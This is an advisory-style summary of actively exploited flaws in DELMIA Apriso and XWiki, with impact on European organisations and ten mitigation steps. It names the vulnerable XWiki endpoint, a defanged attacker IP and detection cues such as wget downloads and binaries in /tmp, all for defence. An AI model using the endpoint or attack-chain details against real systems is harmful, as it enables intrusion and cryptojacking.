Multiple critical vulnerabilities affecting Dassault Systèmes DELMIA Apriso and XWiki have been confirmed to be under active exploitation by threat actors, as reported by CISA and VulnCheck. The key vulnerabilities include CVE-2025-6204, a code injection flaw in DELMIA Apriso allowing arbitrary code execution; CVE-2025-6205, a missing authorization vulnerability in the same product enabling privilege escalation; and CVE-2025-24893, an eval injection vulnerability in XWiki permitting unauthenticated remote code execution via the "/bin/get/Main/SolrSearch" endpoint. DELMIA Apriso versions from Release 2020 through Release 2025 are affected, with patches released in early August 2025. The XWiki vulnerability has been exploited since at least March 2025 in a two-stage attack chain that downloads and executes cryptocurrency mining malware. The attack involves initial staging of a downloader, followed by retrieval and execution of mining payloads that also kill competing miners. The malicious infrastructure is linked to IP addresses geolocated in Vietnam, with evidence of brute-force attempts and ongoing exploitation. The vulnerabilities pose severe risks including unauthorized code execution, privilege escalation, and resource hijacking. CISA has mandated remediation deadlines for affected U.S. federal agencies, underscoring the urgency. The attack vector requires no authentication for XWiki and minimal user interaction, increasing exploitation ease. The combination of high CVSS scores for the DELMIA Apriso flaws and the critical nature of the XWiki vulnerability highlights a significant threat landscape for organizations relying on these platforms.

European organizations using Dassault Systèmes DELMIA Apriso, widely deployed in manufacturing and supply chain management, face risks of unauthorized code execution and privilege escalation, potentially leading to operational disruption, intellectual property theft, and compromised production environments. XWiki, popular in collaborative enterprise environments across Europe, if exploited, can allow attackers to execute arbitrary code without authentication, risking data breaches, system compromise, and lateral movement within networks. The deployment of cryptocurrency miners can degrade system performance and increase operational costs. The active exploitation and attacker infrastructure indicate a persistent threat that could affect critical manufacturing, engineering, and collaborative platforms integral to European industries. Disruption or compromise of these systems could impact business continuity, regulatory compliance (e.g., GDPR), and trust. The threat is particularly concerning for sectors with high reliance on these software products, including automotive, aerospace, and technology firms prevalent in countries like Germany, France, and the UK.

1. Immediately apply the official patches released by Dassault Systèmes for DELMIA Apriso (addressing CVE-2025-6204 and CVE-2025-6205) and the corresponding XWiki updates to remediate CVE-2025-24893. 2. Implement strict network segmentation and firewall rules to restrict access to DELMIA Apriso and XWiki servers, limiting exposure to untrusted networks. 3. Deploy web application firewalls (WAF) with custom rules to detect and block exploitation attempts targeting the known vulnerable endpoints, especially "/bin/get/Main/SolrSearch" in XWiki. 4. Monitor logs and network traffic for indicators of compromise, such as unusual wget downloads, execution of unknown binaries in /tmp, and connections to suspicious IP addresses (e.g., 193.32.208[.]24). 5. Conduct threat hunting for signs of cryptocurrency mining malware and remove any unauthorized payloads. 6. Harden authentication and authorization mechanisms in DELMIA Apriso to prevent privilege escalation. 7. Educate IT and security teams on the attack patterns and ensure rapid incident response capabilities. 8. Consider deploying endpoint detection and response (EDR) solutions to detect post-exploitation activities. 9. Review and update incident response plans to include scenarios involving these vulnerabilities. 10. Coordinate with vendors and cybersecurity authorities for threat intelligence sharing and timely updates.